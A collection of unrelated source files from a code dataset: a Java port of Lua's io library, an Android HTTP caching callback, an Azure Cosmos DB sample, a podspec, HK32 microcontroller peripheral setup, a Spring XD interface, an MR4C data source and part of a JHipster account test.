LuaAPI.lua_pushliteral ( thread, "closed file" );
else
LuaAPI.lua_pushliteral ( thread, "file" );
return 1;
}
}
/* Creates a fresh file userdata with the LUA_FILEHANDLE metatable and leaves it on the stack. */
static FileStruct newfile ( lua_State thread ) {
FileStruct pf = ( FileStruct ) LuaAPI.lua_newuserdata ( thread, new FileStruct (), 0 );
LuaAPI.luaL_getmetatable ( thread, LuaAPI.LUA_FILEHANDLE );
LuaAPI.lua_setmetatable ( thread, -2 );
return pf;
}
/* Wraps an existing FileStruct in a userdata with the LUA_FILEHANDLE metatable and leaves it on the stack. */
static FileStruct newfile ( lua_State thread, FileStruct file ) {
file = ( FileStruct ) LuaAPI.lua_newuserdata ( thread, file, 0 );
LuaAPI.luaL_getmetatable ( thread, LuaAPI.LUA_FILEHANDLE );
LuaAPI.lua_setmetatable ( thread, -2 );
return file;
}
/* Invokes the __close function stored in the environment of the file at stack index 1. */
static int aux_close ( lua_State thread ) {
LuaAPI.lua_getfenv ( thread, 1 );
LuaAPI.lua_getfield ( thread, -1, "__close" );
return LuaAPI.lua_tojavafunction ( thread, -1 ).Call ( thread );
}
/** Implements file:setvbuf(mode [, size]): sets the buffering mode of the file. */
public static final class f_setvbuf implements JavaFunction {
    public int Call ( lua_State thread ) {
        final int[] bufModes = { _IONBF, _IOFBF, _IOLBF };
        final String[] bufModeNames = { "no", "full", "line" };
        FileStruct file = tofile ( thread );
        int chosen = LuaAPI.luaL_checkoption ( thread, 2, null, bufModeNames );
        int size = LuaAPI.luaL_optinteger ( thread, 3, LuaAPI.LUAL_BUFFERSIZE );
        // setvbuf() returns 0 on success; translate to the 1/0 convention pushresult expects.
        int ok = ( file.setvbuf ( bufModes[chosen], size ) == 0 ) ? 1 : 0;
        return pushresult ( thread, ok, null );
    }
}
/* Builds the shared metatable for file handles and registers the file methods on it. */
static void createmeta ( lua_State thread ) {
luaL_Reg[] luaReg = new luaL_Reg[] {
new luaL_Reg ( "close", new io_close () ),
new luaL_Reg ( "flush", new f_flush () ),
new luaL_Reg ( "lines", new f_lines () ),
new luaL_Reg ( "read", new f_read () ),
new luaL_Reg ( "seek", new f_seek () ),
new luaL_Reg ( "setvbuf", new f_setvbuf () ),
new luaL_Reg ( "write", new f_write () ),
new luaL_Reg ( "__gc", new io_gc () ),
new luaL_Reg ( "__tostring", new io_tostring () ),
};
LuaAPI.luaL_newmetatable ( thread, LuaAPI.LUA_FILEHANDLE ); /* create metatable for file handles */
LuaAPI.lua_pushvalue ( thread, -1 ); /* push metatable */
LuaAPI.lua_setfield ( thread, -2, "__index" ); /* metatable.__index = metatable */
LuaAPI.luaL_register ( thread, null, luaReg );
}
/*
** Wraps 'f' in a userdata, optionally stores it in the library environment
** at index 'k' (when k > 0), gives it the environment found at stack -2,
** and publishes it in the io table under 'fname'.
*/
static void createstdfile ( lua_State thread, FileStruct f, int k, String fname ) {
newfile ( thread, f );
if ( k > 0 ) {
LuaAPI.lua_pushvalue ( thread, -1 );
LuaAPI.lua_rawseti ( thread, LuaAPI.LUA_ENVIRONINDEX, k );
}
LuaAPI.lua_pushvalue ( thread, -2 ); /* copy environment */
LuaAPI.lua_setfenv ( thread, -2 ); /* set it */
LuaAPI.lua_setfield ( thread, -3, fname );
}
/* Creates a one-entry environment table whose __close field is the given function. */
static void newfenv ( lua_State thread, JavaFunction cls ) {
LuaAPI.lua_createtable ( thread, 0, 1 );
LuaAPI.lua_pushjavafunction ( thread, cls );
LuaAPI.lua_setfield ( thread, -2, "__close" );
}
/**
 * Library entry point: registers the io table, its metatable, the private
 * environment holding the default input/output files, and the standard
 * stdin/stdout/stderr handles.
 */
public static final class luaopen_io implements JavaFunction {
public int Call ( lua_State thread ) {
createmeta ( thread );
luaL_Reg[] luaReg = new luaL_Reg[] {
new luaL_Reg ( "close", new io_close () ),
new luaL_Reg ( "flush", new io_flush () ),
new luaL_Reg ( "input", new io_input () ),
new luaL_Reg ( "lines", new io_lines () ),
new luaL_Reg ( "open", new io_open () ),
new luaL_Reg ( "output", new io_output () ),
new luaL_Reg ( "popen", new io_popen () ),
new luaL_Reg ( "read", new io_read () ),
new luaL_Reg ( "tmpfile", new io_tmpfile () ),
new luaL_Reg ( "type", new io_type () ),
new luaL_Reg ( "write", new io_write () ),
};
/* create (private) environment (with fields IO_INPUT, IO_OUTPUT, __close) */
newfenv ( thread, new io_fclose () );
LuaAPI.lua_replace ( thread, LuaAPI.LUA_ENVIRONINDEX );
/* open library */
LuaAPI.luaL_register ( thread, LUA_IOLIBNAME, luaReg );
/* create (and set) default files */
newfenv ( thread, new io_noclose () ); /* close function for default files */
createstdfile ( thread, new FileStruct (), IO_INPUT, "stdin" );
createstdfile ( thread, new FileStruct (), IO_OUTPUT, "stdout" );
createstdfile ( thread, new FileStruct (), 0, "stderr" );
LuaAPI.lua_pop ( thread, 1 ); /* pop environment for default files */
LuaAPI.lua_getfield ( thread, -1, "popen" );
newfenv ( thread, new io_pclose () ); /* create environment for 'popen' */
LuaAPI.lua_setfenv ( thread, -2 ); /* set fenv for 'popen' */
LuaAPI.lua_pop ( thread, 1 ); /* pop 'popen' */
return 1;
}
}
// JavaFunction entry point of the enclosing library object itself; intentionally a no-op.
public int Call ( lua_State thread ) {
return 0;
}
}
| 31,271 |
817 | <gh_stars>100-1000
package com.hjq.http.callback;
import com.hjq.http.EasyLog;
import com.hjq.http.EasyUtils;
import com.hjq.http.lifecycle.HttpLifecycleManager;
import com.hjq.http.listener.OnHttpListener;
import com.hjq.http.model.CacheMode;
import com.hjq.http.request.BaseRequest;
import java.io.IOException;
import okhttp3.Call;
import okhttp3.Response;
/**
 * author : <NAME>
 * github : https://github.com/getActivity/EasyHttp
 * time : 2019/11/25
 * desc : callback for normal (non-download) API requests, with optional
 *        read/write caching around the network call
 */
@SuppressWarnings({"rawtypes", "unchecked"})
public final class NormalCallback extends BaseCallback {
/** Request configuration */
private final BaseRequest mBaseRequest;
/** Listener notified of the request lifecycle; may be cleared to suppress duplicate callbacks */
private OnHttpListener mListener;
public NormalCallback(BaseRequest request) {
super(request);
mBaseRequest = request;
}
public NormalCallback setListener(OnHttpListener listener) {
mListener = listener;
return this;
}
@Override
public void start() {
CacheMode cacheMode = mBaseRequest.getRequestCache().getMode();
if (cacheMode != CacheMode.USE_CACHE_ONLY && cacheMode != CacheMode.USE_CACHE_FIRST) {
// Cache is not consulted before the request in these modes; go straight to the network.
super.start();
return;
}
try {
Object result = mBaseRequest.getRequestHandler().readCache(mBaseRequest.getLifecycleOwner(),
mBaseRequest.getRequestApi(), EasyUtils.getReflectType(mListener));
EasyLog.print("ReadCache result:" + result);
// No cached value: fall back to a network request.
if (result == null) {
super.start();
return;
}
// Cache hit: deliver the cached result (the 'true' flag marks it as coming from cache).
EasyUtils.post(() -> {
if (mListener == null || !HttpLifecycleManager.isLifecycleActive(mBaseRequest.getLifecycleOwner())) {
return;
}
mListener.onStart(getCall());
mListener.onSucceed(result, true);
mListener.onEnd(getCall());
});
// USE_CACHE_FIRST: after serving the cache, still refresh from the network.
if (cacheMode == CacheMode.USE_CACHE_FIRST) {
EasyUtils.postDelayed(() -> {
if (!HttpLifecycleManager.isLifecycleActive(mBaseRequest.getLifecycleOwner())) {
return;
}
// Clear the listener so the network response does not trigger a second callback.
mListener = null;
super.start();
}, 1);
}
} catch (Throwable throwable) {
EasyLog.print("ReadCache error");
EasyLog.print(throwable);
super.start();
}
}
@Override
protected void onStart(Call call) {
EasyUtils.post(() -> {
if (mListener == null || !HttpLifecycleManager.isLifecycleActive(mBaseRequest.getLifecycleOwner())) {
return;
}
mListener.onStart(call);
});
}
@Override
protected void onResponse(Response response) throws Exception {
// Log how long the request took.
EasyLog.print("RequestConsuming:" +
(response.receivedResponseAtMillis() - response.sentRequestAtMillis()) + " ms");
// Parse the response body into the target bean type.
final Object result = mBaseRequest.getRequestHandler().requestSucceed(
mBaseRequest.getLifecycleOwner(), mBaseRequest.getRequestApi(),
response, EasyUtils.getReflectType(mListener));
CacheMode cacheMode = mBaseRequest.getRequestCache().getMode();
if (cacheMode == CacheMode.USE_CACHE_ONLY || cacheMode == CacheMode.USE_CACHE_FIRST) {
// These modes keep the cache up to date; a write failure is logged but not fatal.
try {
boolean writeSucceed = mBaseRequest.getRequestHandler().writeCache(mBaseRequest.getLifecycleOwner(),
mBaseRequest.getRequestApi(), response, result);
EasyLog.print("WriteCache result:" + writeSucceed);
} catch (Throwable throwable) {
EasyLog.print("WriteCache error");
EasyLog.print(throwable);
}
}
EasyUtils.post(() -> {
if (mListener == null || !HttpLifecycleManager.isLifecycleActive(mBaseRequest.getLifecycleOwner())) {
return;
}
mListener.onSucceed(result, false);
mListener.onEnd(getCall());
});
}
@Override
protected void onFailure(Exception e) {
// USE_CACHE_AFTER_FAILURE: read the cache only when the network request failed with an I/O error.
if (e instanceof IOException && mBaseRequest.getRequestCache().getMode() == CacheMode.USE_CACHE_AFTER_FAILURE) {
try {
Object result = mBaseRequest.getRequestHandler().readCache(mBaseRequest.getLifecycleOwner(),
mBaseRequest.getRequestApi(), EasyUtils.getReflectType(mListener));
EasyLog.print("ReadCache result:" + result);
if (result != null) {
EasyUtils.post(() -> {
if (mListener == null || !HttpLifecycleManager.isLifecycleActive(mBaseRequest.getLifecycleOwner())) {
return;
}
mListener.onSucceed(result, true);
mListener.onEnd(getCall());
});
return;
}
} catch (Throwable throwable) {
EasyLog.print("ReadCache error");
EasyLog.print(throwable);
}
}
final Exception exception = mBaseRequest.getRequestHandler().requestFail(
mBaseRequest.getLifecycleOwner(), mBaseRequest.getRequestApi(), e);
// Log the error stack trace.
EasyLog.print(exception);
EasyUtils.post(() -> {
if (mListener == null || !HttpLifecycleManager.isLifecycleActive(mBaseRequest.getLifecycleOwner())) {
return;
}
mListener.onFail(exception);
mListener.onEnd(getCall());
});
}
}
1,350 | <reponame>billwert/azure-sdk-for-java
// Copyright (c) Microsoft Corporation. All rights reserved.
// Licensed under the MIT License.
// Code generated by Microsoft (R) AutoRest Code Generator.
package com.azure.resourcemanager.cosmos.generated;
import com.azure.core.util.Context;
import com.azure.resourcemanager.cosmos.models.FailoverPolicies;
import com.azure.resourcemanager.cosmos.models.FailoverPolicy;
import java.util.Arrays;
/** Samples for DatabaseAccounts FailoverPriorityChange. */
public final class DatabaseAccountsFailoverPriorityChangeSamples {
    /*
     * x-ms-original-file: specification/cosmos-db/resource-manager/Microsoft.DocumentDB/stable/2021-10-15/examples/CosmosDBDatabaseAccountFailoverPriorityChange.json
     */
    /**
     * Sample code: CosmosDBDatabaseAccountFailoverPriorityChange.
     *
     * @param azure The entry point for accessing resource management APIs in Azure.
     */
    public static void cosmosDBDatabaseAccountFailoverPriorityChange(
        com.azure.resourcemanager.AzureResourceManager azure) {
        // Demonstrates swapping failover priorities for account "ddb1-failover" in
        // resource group "rg1": eastus becomes the write region (priority 0),
        // westus the first read/failover region (priority 1).
        azure
            .cosmosDBAccounts()
            .manager()
            .serviceClient()
            .getDatabaseAccounts()
            .failoverPriorityChange(
                "rg1",
                "ddb1-failover",
                new FailoverPolicies()
                    .withFailoverPolicies(
                        Arrays
                            .asList(
                                new FailoverPolicy().withLocationName("eastus").withFailoverPriority(0),
                                new FailoverPolicy().withLocationName("westus").withFailoverPriority(1))),
                Context.NONE);
    }
}
| 712 |
5,169 | {
"name": "RoundCornerView",
"version": "0.1.0",
"summary": "Round the view that is being passed",
"description": "\"TODO: Add long description of the pod here.\"",
"homepage": "https://github.com/waqar1992/RoundedCornerView",
"license": {
"type": "MIT",
"file": "LICENSE"
},
"authors": {
"waqar.ahmed": "<EMAIL>"
},
"source": {
"git": "https://github.com/waqar1992/RoundedCornerView.git",
"commit": "<PASSWORD>"
},
"platforms": {
"ios": "9.0"
},
"swift_version": "4.2",
"source_files": "RoundCornerView/Classes/**/*",
"frameworks": "UIKit"
}
| 253 |
7,482 | /*
* Copyright (c) 2006-2018, RT-Thread Development Team
*
* SPDX-License-Identifier: Apache-2.0
*
* Change Logs:
* Date Author Notes
* 2021-08-14 Jonas first version
*/
#include <hk32f0xx.h>
#include <rtthread.h>
#include "hk32_msp.h"
#ifdef BSP_USING_UART
/**
 * @brief  Enable clocks and configure TX/RX pins for the given USART instance.
 * @param  Instance  USART peripheral base address (USART1 or USART2), passed as void*.
 *
 * USART1 is remapped to PB6 (TX) / PB7 (RX) because USART1_REMAP is defined
 * below; USART2 uses PA2 (TX) / PA3 (RX).
 */
void hk32_msp_usart_init(void *Instance)
{
    GPIO_InitTypeDef GPIO_InitStruct;
    USART_TypeDef *USARTx = (USART_TypeDef *)Instance;

    GPIO_StructInit(&GPIO_InitStruct);
    GPIO_InitStruct.GPIO_Speed = GPIO_Speed_50MHz;

#ifdef BSP_USING_UART1
    if (USART1 == USARTx)
    {
#define USART1_REMAP
#ifndef USART1_REMAP
        /* USART1 on PA9 (TX) / PA10 (RX), AF1; USART1 clock is on APB2 */
        RCC_APB2PeriphClockCmd(RCC_APB2Periph_USART1, ENABLE);
        RCC_AHBPeriphClockCmd(RCC_AHBPeriph_GPIOA, ENABLE);

        GPIO_InitStruct.GPIO_OType = GPIO_OType_PP;
        GPIO_InitStruct.GPIO_Mode = GPIO_Mode_AF;
        GPIO_InitStruct.GPIO_Pin = GPIO_Pin_9;
        GPIO_Init(GPIOA, &GPIO_InitStruct);

        GPIO_InitStruct.GPIO_Mode = GPIO_Mode_AF;
        GPIO_InitStruct.GPIO_OType = GPIO_OType_PP;
        GPIO_InitStruct.GPIO_PuPd = GPIO_PuPd_UP;   /* pull-up on RX so the line does not float */
        GPIO_InitStruct.GPIO_Pin = GPIO_Pin_10;
        GPIO_Init(GPIOA, &GPIO_InitStruct);

        GPIO_PinAFConfig(GPIOA, GPIO_PinSource9, GPIO_AF_1);
        GPIO_PinAFConfig(GPIOA, GPIO_PinSource10, GPIO_AF_1);
#else
        /* USART1 remapped to PB6 (TX) / PB7 (RX), AF0 */
        RCC_APB2PeriphClockCmd(RCC_APB2Periph_USART1, ENABLE);
        RCC_AHBPeriphClockCmd(RCC_AHBPeriph_GPIOB, ENABLE);

        GPIO_InitStruct.GPIO_OType = GPIO_OType_PP;
        GPIO_InitStruct.GPIO_Mode = GPIO_Mode_AF;
        GPIO_InitStruct.GPIO_Pin = GPIO_Pin_6;
        GPIO_Init(GPIOB, &GPIO_InitStruct);

        GPIO_InitStruct.GPIO_Mode = GPIO_Mode_AF;
        GPIO_InitStruct.GPIO_OType = GPIO_OType_PP;
        GPIO_InitStruct.GPIO_PuPd = GPIO_PuPd_UP;   /* pull-up on RX so the line does not float */
        GPIO_InitStruct.GPIO_Pin = GPIO_Pin_7;
        GPIO_Init(GPIOB, &GPIO_InitStruct);

        GPIO_PinAFConfig(GPIOB, GPIO_PinSource6, GPIO_AF_0);
        GPIO_PinAFConfig(GPIOB, GPIO_PinSource7, GPIO_AF_0);
#endif
    }
#endif

#ifdef BSP_USING_UART2
    if (USART2 == USARTx)
    {
        /* USART2 on PA2 (TX) / PA3 (RX), AF1.
         * USART2 sits on the APB1 bus, so its clock must be enabled through
         * RCC_APB1PeriphClockCmd. The previous code passed the APB1 constant
         * to RCC_APB2PeriphClockCmd, which enabled the wrong bit and left the
         * USART2 peripheral clock disabled. */
        RCC_APB1PeriphClockCmd(RCC_APB1Periph_USART2, ENABLE);
        RCC_AHBPeriphClockCmd(RCC_AHBPeriph_GPIOA, ENABLE);

        GPIO_InitStruct.GPIO_OType = GPIO_OType_PP;
        GPIO_InitStruct.GPIO_Mode = GPIO_Mode_AF;
        GPIO_InitStruct.GPIO_Pin = GPIO_Pin_2;
        GPIO_Init(GPIOA, &GPIO_InitStruct);

        GPIO_InitStruct.GPIO_Mode = GPIO_Mode_AF;
        GPIO_InitStruct.GPIO_OType = GPIO_OType_PP;
        GPIO_InitStruct.GPIO_PuPd = GPIO_PuPd_UP;   /* pull-up on RX so the line does not float */
        GPIO_InitStruct.GPIO_Pin = GPIO_Pin_3;
        GPIO_Init(GPIOA, &GPIO_InitStruct);

        GPIO_PinAFConfig(GPIOA, GPIO_PinSource2, GPIO_AF_1);
        GPIO_PinAFConfig(GPIOA, GPIO_PinSource3, GPIO_AF_1);
    }
#endif
    /* Add others */
}
#endif /* BSP_USING_SERIAL */
#ifdef BSP_USING_I2C
/**
 * @brief  Enable clocks and configure SCL/SDA pins for the given I2C instance.
 * @param  Instance  I2C peripheral base address (I2C1), passed as void*.
 *
 * Default mapping: PB6 (SCL) / PB7 (SDA), AF1; with I2C1_REMAP: PB8/PB9.
 *
 * NOTE(review): both branches configure the pins as push-pull (GPIO_OType_PP)
 * although I2C lines are conventionally open-drain with external pull-ups —
 * kept as-is here, but worth confirming against the board design.
 */
void hk32_msp_i2c_init(void *Instance)
{
    GPIO_InitTypeDef GPIO_InitStruct;
    I2C_TypeDef *I2Cx = (I2C_TypeDef *)Instance;

    GPIO_StructInit(&GPIO_InitStruct);
    GPIO_InitStruct.GPIO_Speed = GPIO_Speed_50MHz;

#ifdef BSP_USING_I2C1
    if (I2C1 == I2Cx)
    {
#ifndef I2C1_REMAP
        /* I2C1 on PB6 (SCL) / PB7 (SDA), AF1; I2C1 clock is on APB1 */
        RCC_APB1PeriphClockCmd(RCC_APB1Periph_I2C1, ENABLE);
        RCC_AHBPeriphClockCmd(RCC_AHBPeriph_GPIOB, ENABLE);

        GPIO_InitStruct.GPIO_OType = GPIO_OType_PP;
        GPIO_InitStruct.GPIO_Mode = GPIO_Mode_AF;
        GPIO_InitStruct.GPIO_Pin = GPIO_Pin_6;
        GPIO_Init(GPIOB, &GPIO_InitStruct);

        /* Fix: the second init previously re-configured PB6 instead of PB7,
         * leaving the SDA pin uninitialized even though its AF was selected. */
        GPIO_InitStruct.GPIO_Mode = GPIO_Mode_AF;
        GPIO_InitStruct.GPIO_OType = GPIO_OType_PP;
        GPIO_InitStruct.GPIO_PuPd = GPIO_PuPd_UP;
        GPIO_InitStruct.GPIO_Pin = GPIO_Pin_7;
        GPIO_Init(GPIOB, &GPIO_InitStruct);

        GPIO_PinAFConfig(GPIOB, GPIO_PinSource6, GPIO_AF_1);
        GPIO_PinAFConfig(GPIOB, GPIO_PinSource7, GPIO_AF_1);
#else
        /* I2C1 remapped to PB8 (SCL) / PB9 (SDA), AF1.
         * Fix: I2C1 is an APB1 peripheral, so its clock must be enabled through
         * RCC_APB1PeriphClockCmd; the previous code passed the APB1 constant to
         * RCC_APB2PeriphClockCmd, leaving the peripheral clock disabled. */
        RCC_APB1PeriphClockCmd(RCC_APB1Periph_I2C1, ENABLE);
        RCC_AHBPeriphClockCmd(RCC_AHBPeriph_GPIOB, ENABLE);

        GPIO_InitStruct.GPIO_OType = GPIO_OType_PP;
        GPIO_InitStruct.GPIO_Mode = GPIO_Mode_AF;
        GPIO_InitStruct.GPIO_PuPd = GPIO_PuPd_UP;
        GPIO_InitStruct.GPIO_Pin = GPIO_Pin_8;
        GPIO_Init(GPIOB, &GPIO_InitStruct);

        GPIO_InitStruct.GPIO_Mode = GPIO_Mode_AF;
        GPIO_InitStruct.GPIO_OType = GPIO_OType_PP;
        GPIO_InitStruct.GPIO_PuPd = GPIO_PuPd_UP;
        GPIO_InitStruct.GPIO_Pin = GPIO_Pin_9;
        GPIO_Init(GPIOB, &GPIO_InitStruct);

        GPIO_PinAFConfig(GPIOB, GPIO_PinSource8, GPIO_AF_1);
        GPIO_PinAFConfig(GPIOB, GPIO_PinSource9, GPIO_AF_1);
#endif
    }
#endif
    /* Add others */
}
#endif /* BSP_USING_I2C */
#ifdef BSP_USING_SPI
/**
 * @brief  Enable clocks and configure SCK/MISO/MOSI pins for the given SPI instance.
 * @param  Instance  SPI peripheral base address (SPI1), passed as void*.
 *
 * Default mapping: PA5/PA6/PA7 (AF0) with PA4 as a software-driven NSS GPIO;
 * with SPI1_REMAP: PB3/PB4/PB5 (AF0) with PA15 as the NSS GPIO.
 */
void hk32_msp_spi_init(void *Instance)
{
GPIO_InitTypeDef GPIO_InitStruct;
SPI_TypeDef *SPIx = (SPI_TypeDef *)Instance;
GPIO_StructInit(&GPIO_InitStruct);
GPIO_InitStruct.GPIO_Speed = GPIO_Speed_50MHz;
#ifdef BSP_USING_SPI1
if (SPI1 == SPIx)
{
#ifndef SPI1_REMAP
RCC_APB2PeriphClockCmd(RCC_APB2Periph_SPI1, ENABLE);
RCC_AHBPeriphClockCmd(RCC_AHBPeriph_GPIOA, ENABLE);
/* PA4: chip-select driven as a plain output (software NSS) */
GPIO_InitStruct.GPIO_OType = GPIO_OType_PP;
GPIO_InitStruct.GPIO_Mode = GPIO_Mode_OUT;
GPIO_InitStruct.GPIO_Pin = GPIO_Pin_4;
GPIO_Init(GPIOA, &GPIO_InitStruct);
/* PA5 (SCK), PA6 (MISO), PA7 (MOSI) as AF0 with pull-ups */
GPIO_InitStruct.GPIO_Mode = GPIO_Mode_AF;
GPIO_InitStruct.GPIO_OType = GPIO_OType_PP;
GPIO_InitStruct.GPIO_PuPd = GPIO_PuPd_UP;
GPIO_InitStruct.GPIO_Pin = GPIO_Pin_5 | GPIO_Pin_6 | GPIO_Pin_7;
GPIO_Init(GPIOA, &GPIO_InitStruct);
GPIO_PinAFConfig(GPIOA, GPIO_PinSource5, GPIO_AF_0);
GPIO_PinAFConfig(GPIOA, GPIO_PinSource6, GPIO_AF_0);
GPIO_PinAFConfig(GPIOA, GPIO_PinSource7, GPIO_AF_0);
#else
RCC_APB2PeriphClockCmd(RCC_APB2Periph_SPI1, ENABLE);
RCC_AHBPeriphClockCmd(RCC_AHBPeriph_GPIOB, ENABLE);
RCC_AHBPeriphClockCmd(RCC_AHBPeriph_GPIOA, ENABLE);
/* PA15: chip-select driven as a plain output (software NSS) */
GPIO_InitStruct.GPIO_OType = GPIO_OType_PP;
GPIO_InitStruct.GPIO_Mode = GPIO_Mode_OUT;
GPIO_InitStruct.GPIO_Pin = GPIO_Pin_15;
GPIO_Init(GPIOA, &GPIO_InitStruct);
/* PB3 (SCK), PB4 (MISO), PB5 (MOSI) as AF0 with pull-ups */
GPIO_InitStruct.GPIO_Mode = GPIO_Mode_AF;
GPIO_InitStruct.GPIO_OType = GPIO_OType_PP;
GPIO_InitStruct.GPIO_PuPd = GPIO_PuPd_UP;
GPIO_InitStruct.GPIO_Pin = GPIO_Pin_3 | GPIO_Pin_4 | GPIO_Pin_5;
GPIO_Init(GPIOB, &GPIO_InitStruct);
GPIO_PinAFConfig(GPIOB, GPIO_PinSource3, GPIO_AF_0);
GPIO_PinAFConfig(GPIOB, GPIO_PinSource4, GPIO_AF_0);
GPIO_PinAFConfig(GPIOB, GPIO_PinSource5, GPIO_AF_0);
#endif
}
#endif
/* Add others */
}
#endif /* BSP_USING_I2C */
| 3,365 |
332 | <gh_stars>100-1000
/*
* Copyright 2002-2013 the original author or authors.
*
* Licensed under the Apache License, Version 2.0 (the "License");
* you may not use this file except in compliance with the License.
* You may obtain a copy of the License at
*
* http://www.apache.org/licenses/LICENSE-2.0
*
* Unless required by applicable law or agreed to in writing, software
* distributed under the License is distributed on an "AS IS" BASIS,
* WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
* See the License for the specific language governing permissions and
* limitations under the License.
*/
package org.springframework.xd.store;
import java.io.Serializable;
import org.springframework.data.repository.PagingAndSortingRepository;
/**
 * Implemented by XD repositories; exists mainly as a means of combining several
 * repository interfaces into one.
 *
 * @param <T> the domain type the repository manages
 * @param <ID> the identifier type; must be comparable so key ranges can be expressed
 * @author <NAME>
 */
public interface DomainRepository<T, ID extends Serializable & Comparable<ID>> extends
PagingAndSortingRepository<T, ID>, RangeCapableRepository<T, ID> {
}
| 292 |
1,062 | <gh_stars>1000+
/**
* Copyright 2014 Google Inc. All rights reserved.
*
* Licensed under the Apache License, Version 2.0 (the "License");
* you may not use this file except in compliance with the License.
* You may obtain a copy of the License at
*
* http://www.apache.org/licenses/LICENSE-2.0
*
* Unless required by applicable law or agreed to in writing, software
* distributed under the License is distributed on an "AS IS" BASIS,
* WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
* See the License for the specific language governing permissions and
* limitations under the License.
*/
#include <string>
#include <iostream>
#include <stdexcept>
#include "external/external_api.h"
namespace MR4C {
/**
 * DataFileSource backed by callbacks supplied from external (C) code.
 * Every data-access operation forwards to the function pointers in
 * CExternalDataSourceCallbacks; a callback reporting failure is surfaced
 * as a std::runtime_error.
 */
class ExternalDataFileSourceImpl : public DataFileSource {
	friend class ExternalDataFileSource;
	private:
		bool m_released;                          // tracks release state (see release(): intentionally never set)
		CExternalDataSourceCallbacks m_callbacks; // external function pointers for all data access
		// Only constructible by ExternalDataFileSource (friend).
		ExternalDataFileSourceImpl(const CExternalDataSourceCallbacks& callbacks) {
			m_released = false;
			m_callbacks = callbacks;
		}
		// Returns a pointer to the file's bytes; throws if the callback fails.
		char* getFileBytes() const {
			assertNotReleased();
			char* bytes = m_callbacks.getBytesCallback();
			if ( bytes==NULL ) {
				throw std::runtime_error("GetBytes callback failed");
			}
			return bytes;
		}
		// Returns the total file size in bytes; throws if the callback fails.
		size_t getFileSize() const {
			assertNotReleased();
			size_t size;
			bool success = m_callbacks.getSizeCallback(&size);
			if ( !success ) {
				throw std::runtime_error("GetFileSize callback failed");
			}
			return size;
		}
		// Reads up to 'num' bytes into 'buf'; returns the number actually read.
		size_t read(char* buf, size_t num) {
			assertNotReleased();
			size_t numRead;
			bool success = m_callbacks.readCallback(buf, num, &numRead);
			if ( !success ) {
				throw std::runtime_error("Read callback failed");
			}
			return numRead;
		}
		// Skips up to 'num' bytes; returns the number actually skipped.
		size_t skip(size_t num) {
			assertNotReleased();
			size_t numSkipped;
			bool success = m_callbacks.skipCallback(num, &numSkipped);
			if ( !success ) {
				throw std::runtime_error("Skip callback failed");
			}
			return numSkipped;
		}
		// Notifies the external side that the data may be released.
		void release() {
			if ( !m_released ) {
				m_callbacks.releaseCallback();
				// allowing file to be released and then re-accessed if permitted on the Java side
				//m_released = true;
			}
		}
		bool isReleased() const {
			return m_released;
		}
		// Guards data access after release; a no-op today because m_released is never set (see release()).
		void assertNotReleased() const {
			if ( m_released ) {
				throw std::logic_error("Data source already released");
			}
		}
	public:
		~ExternalDataFileSourceImpl() {
		}
};
// Wraps externally supplied C callbacks in a shared DataFileSource implementation.
ExternalDataFileSource::ExternalDataFileSource(const CExternalDataSourceCallbacks& callbacks) {
	m_impl = std::shared_ptr<DataFileSource>(new ExternalDataFileSourceImpl(callbacks));
}
// Adopts an existing DataFileSource, sharing ownership with the caller.
ExternalDataFileSource::ExternalDataFileSource(std::shared_ptr<DataFileSource> src) {
	m_impl = src;
}
// Returns the wrapped source, sharing ownership with the caller.
std::shared_ptr<DataFileSource> ExternalDataFileSource::getFileSource() const {
	return m_impl;
}
// Returns a pointer to the underlying file bytes; may throw if the source fails.
const char* ExternalDataFileSource::getBytes() const {
	return m_impl->getFileBytes();
}
// Returns the underlying file size in bytes; may throw if the source fails.
size_t ExternalDataFileSource::getSize() const {
	return m_impl->getFileSize();
}
// Destructor: the shared_ptr member releases the wrapped source automatically.
ExternalDataFileSource::~ExternalDataFileSource() {
}
}
| 1,055 |
1,275 | <gh_stars>1000+
package io.github.jhipster.sample.web.rest;
import static io.github.jhipster.sample.web.rest.AccountResourceIT.TEST_USER_LOGIN;
import static org.assertj.core.api.Assertions.assertThat;
import static org.springframework.test.web.servlet.request.MockMvcRequestBuilders.*;
import static org.springframework.test.web.servlet.result.MockMvcResultMatchers.*;
import io.github.jhipster.sample.IntegrationTest;
import io.github.jhipster.sample.config.Constants;
import io.github.jhipster.sample.domain.User;
import io.github.jhipster.sample.repository.AuthorityRepository;
import io.github.jhipster.sample.repository.UserRepository;
import io.github.jhipster.sample.security.AuthoritiesConstants;
import io.github.jhipster.sample.service.UserService;
import io.github.jhipster.sample.service.dto.AdminUserDTO;
import io.github.jhipster.sample.service.dto.PasswordChangeDTO;
import io.github.jhipster.sample.service.dto.UserDTO;
import io.github.jhipster.sample.web.rest.vm.KeyAndPasswordVM;
import io.github.jhipster.sample.web.rest.vm.ManagedUserVM;
import java.time.Instant;
import java.util.*;
import org.apache.commons.lang3.RandomStringUtils;
import org.junit.jupiter.api.Test;
import org.springframework.beans.factory.annotation.Autowired;
import org.springframework.boot.test.autoconfigure.web.servlet.AutoConfigureMockMvc;
import org.springframework.http.MediaType;
import org.springframework.security.crypto.password.PasswordEncoder;
import org.springframework.security.test.context.support.WithMockUser;
import org.springframework.test.web.servlet.MockMvc;
import org.springframework.transaction.annotation.Transactional;
/**
* Integration tests for the {@link AccountResource} REST controller.
*/
@AutoConfigureMockMvc
@WithMockUser(value = TEST_USER_LOGIN)
@IntegrationTest
class AccountResourceIT {
static final String TEST_USER_LOGIN = "test";
@Autowired
private UserRepository userRepository;
@Autowired
private AuthorityRepository authorityRepository;
@Autowired
private UserService userService;
@Autowired
private PasswordEncoder passwordEncoder;
@Autowired
private MockMvc restAccountMockMvc;
/** GET /api/authenticate without a principal returns 200 with an empty body. */
@Test
@WithUnauthenticatedMockUser
void testNonAuthenticatedUser() throws Exception {
restAccountMockMvc
.perform(get("/api/authenticate").accept(MediaType.APPLICATION_JSON))
.andExpect(status().isOk())
.andExpect(content().string(""));
}
/** GET /api/authenticate echoes the remote user's login when a principal is present. */
@Test
void testAuthenticatedUser() throws Exception {
restAccountMockMvc
.perform(
get("/api/authenticate")
.with(request -> {
request.setRemoteUser(TEST_USER_LOGIN);
return request;
})
.accept(MediaType.APPLICATION_JSON)
)
.andExpect(status().isOk())
.andExpect(content().string(TEST_USER_LOGIN));
}
/** GET /api/account returns the full profile of the currently authenticated user. */
@Test
void testGetExistingAccount() throws Exception {
Set<String> authorities = new HashSet<>();
